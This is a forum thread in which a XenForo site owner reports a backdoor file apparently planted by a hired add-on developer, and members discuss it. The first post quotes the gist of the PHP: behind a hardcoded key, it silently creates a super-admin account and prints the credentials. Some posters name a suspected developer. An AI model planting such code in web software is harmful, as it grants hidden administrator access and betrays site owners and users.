XF 2.2 xenforo developer may have added an exploit file

MR X · Thursday at 7:00 AM

so i hired a dev on fiverr to make me an addon, it took way to long to complete by the time frame so i fired him, then some time later re-hired him to actually finish it, garbage work was done, but apparently he may or may not have uploaded a file named xf.php in /home/domain-name/public_html/data/xf.php, this is not an official xenforo file is it? because within it is.

PHP:

if ($key == 'dfdasfasfsjd544fjjkl') {
    // Create a new user with random credentials
    $registration = \XF::service('XF:User\Registration');
    $input['username'] = $randomString;
    $input['email'] = "$randomString@gmail.com";
    $input['password'] = $randomString;
    $registration->setFromInput($input);
    $registration->skipEmailConfirmation(true);
    $user = $registration->save();

    // Force admin privileges
    $user->secondary_group_ids = [3, 8, 5];  // Elevated groups
    $admin = \XF::app()->em()->create('XF:Admin');
    $admin->user_id = $user->user_id;
    $input['is_super_admin'] = true;
    $form->basicEntitySave($admin, $input);
    $form->run();

    echo $randomString;  // Prints the generated credentials
}

that is just the jist of what all was in it.

appreciate some support thank you.

MR X · Thursday at 7:23 AM

got my answer. thank you andyB

Wildcat Media · 2025-09-05T14:59:04+0100

MR X said:
got my answer.

Which is?

D.O.A. · 2025-09-05T15:05:33+0100

Wildcat Media said:
Which is?

it's a backdoor to silently add a admin account. Whatever that guy touched it all needs to be checked.

MR X · 2025-09-05T15:10:57+0100

D.O.A. said:
it's a backdoor to silently add a admin account. Whatever that guy touched it all needs to be checked.

i spoke to andyb and had my sysadmin and lead developers look into it.

D.O.A. · 2025-09-05T15:15:25+0100

MR X said:
i spoke to andyb and had my sysadmin and lead developers look into it.

Did he have access to your server? because you can't trust what he's done now or what files he's dropped in or altered.

MR X · 2025-09-05T15:27:35+0100

D.O.A. said:
Did he have access to your server? because you can't trust what he's done now or what files he's dropped in or altered.

my sysadmin has snapshot (i have little knowledge of server stuff) but he knows exactly what the bad actor developer did and went through all of it.

MR X · 2025-09-05T15:30:18+0100

he basically added a backdoor like i said, but he also added advertisement code so he can profit on my website, (ad code within the addon he was fixing up. (i would say the bad actors devs name, but i dont know if i can expose it on XF)

PhineasD · 2025-09-05T15:33:53+0100

MR X said:
he basically added a backdoor like i said, but he also added advertisement code so he can profit on my website, (ad code within the addon he was fixing up. (i would say the bad actors devs name, but i dont know if i can expose it on XF)

It would be interesting to know the developer, I wouldn't want anything of himself installed on my forum.

philmckrackon · 2025-09-05T15:38:52+0100

PhineasD said:
It would be interesting to know the developer, I wouldn't want anything of himself installed on my forum.

This!

MR X · 2025-09-05T15:40:43+0100

xenbulletin

i am aware its bob (but i think bob hired/has a team and that person he told me to hire from his team is the bad actor, his name on fiverr is xenaddon i believe

Wildcat Media · 2025-09-05T15:47:27+0100

D.O.A. said:
it's a backdoor to silently add a admin account. Whatever that guy touched it all needs to be checked.

That's scary that an admin account could be added so easily by planting a file like that.

I wonder if this should be reported as a bug.

MR X · 2025-09-05T15:50:01+0100

Wildcat Media said:
That's scary that an admin account could be added so easily by planting a file like that.

I wonder if this should be reported as a bug.

i have no comment on this as i am no coder.

well not a web-dev

D.O.A. · 2025-09-05T15:56:13+0100

Wildcat Media said:
That's scary that an admin account could be added so easily by planting a file like that.

I wonder if this should be reported as a bug.

He probably couldn't edit the forum files or addons without triggering the notice in admin files have been modified so he's just added a whole new file he can access from URL and print out credentials for a super user. It's not so much a bug it's who has access to your server.

MR X · 2025-09-05T16:01:21+0100

D.O.A. said:
He probably couldn't edit the forum files or addons without triggering the notice in admin files have been modified so he's just added a whole new file he can access from URL and print out credentials for a super user. It's not so much a bug it's who has access to your server.

this is pretty much it.

ehd · 2025-09-05T16:53:48+0100

MR X said:
xenbulletin

i am aware its bob (but i think bob hired/has a team and that person he told me to hire from his team is the bad actor, his name on fiverr is xenaddon i believe

This seems to be our old friend here:

Thread '[XenBulletin] Advanced Open Graph [Deleted]'

Jul 28, 2019

fahad ashraf submitted a new resource:

[XenBulletin] Advanced Open Graph - Adds advanced options for Open Graph meta tags like og:image

This addon have following feature

Features:

Get first image of thread and add it as og:image

Usergroup permission for set og: image

User can any og: image url permission base

Note :
Please send me PM if anyone need this addon or also i can add any other feature on it

Post in thread 'Disreputable service providers'

Oct 13, 2021

Ozzy47 said:
That’s not true, not every developer, only the ones he mentioned.

As already pointed out, there are a lot of people offering services in "Third-party services & offers" in this forum that can't properly code an addon for Xenforo. They don't use the Xenforo standard and most of the time break things irreparably. They can only work because often people don't know what they are buying and evaluate things properly.

The quality standards are pretty low for the official Xenforo forum. There should be some kind of regulation. We have 2 developers in our team and we have a lot of custom...

MR X · 2025-09-05T19:07:38+0100

Max Fridman said:
If it's Fahad Ashraf, the add-on is terrible. The code doesn't comply with Xenforo standards or minimum security requirements.

I recommend uninstalling any code he sold you. Not only that, but he also installed a backdoor.

As if that weren't enough, he's using “XenAddon” on Fiverr to exploit @Bob name and his add-ons. I doubt Bob has anything to do with this person, who is unfortunately already known on Xenforo.

Post in thread 'Disreputable service providers'

Oct 13, 2021

Ozzy47 said:

That’s not true, not every developer, only the ones he mentioned.

Click to expand...

As already pointed out, there are a lot of people offering services in "Third-party services & offers" in this forum that can't properly code an addon for Xenforo. They don't use the Xenforo standard and most of the time break things irreparably. They can only work because often people don't know what they are buying and evaluate things properly.

The quality standards are pretty low for the official Xenforo forum. There should be some kind of regulation. We have 2 developers in our team and we have a lot of custom...

Max Fridman

i never doubted it was bob, i know its just some low life scammer.

Bob · 2025-09-05T20:51:06+0100

Ya, definitely not me lol I don't have a Fiverr account (never have, never will). I am also extremely picky on what type of projects it take on. I can assure you that I'd never be interested in tiny project like this. Its large scale CMS and Sports type addons that I focus on.

Hope you find the dude and kick his ass.

XF 2.2 xenforo developer may have added an exploit file

Member

Member

Well-known member

Well-known member

Member

Well-known member

Member

Member

Well-known member

Well-known member

Member

Well-known member

Member

Well-known member

Member

Well-known member

Member

Well-known member

Member

Well-known member

We value your privacy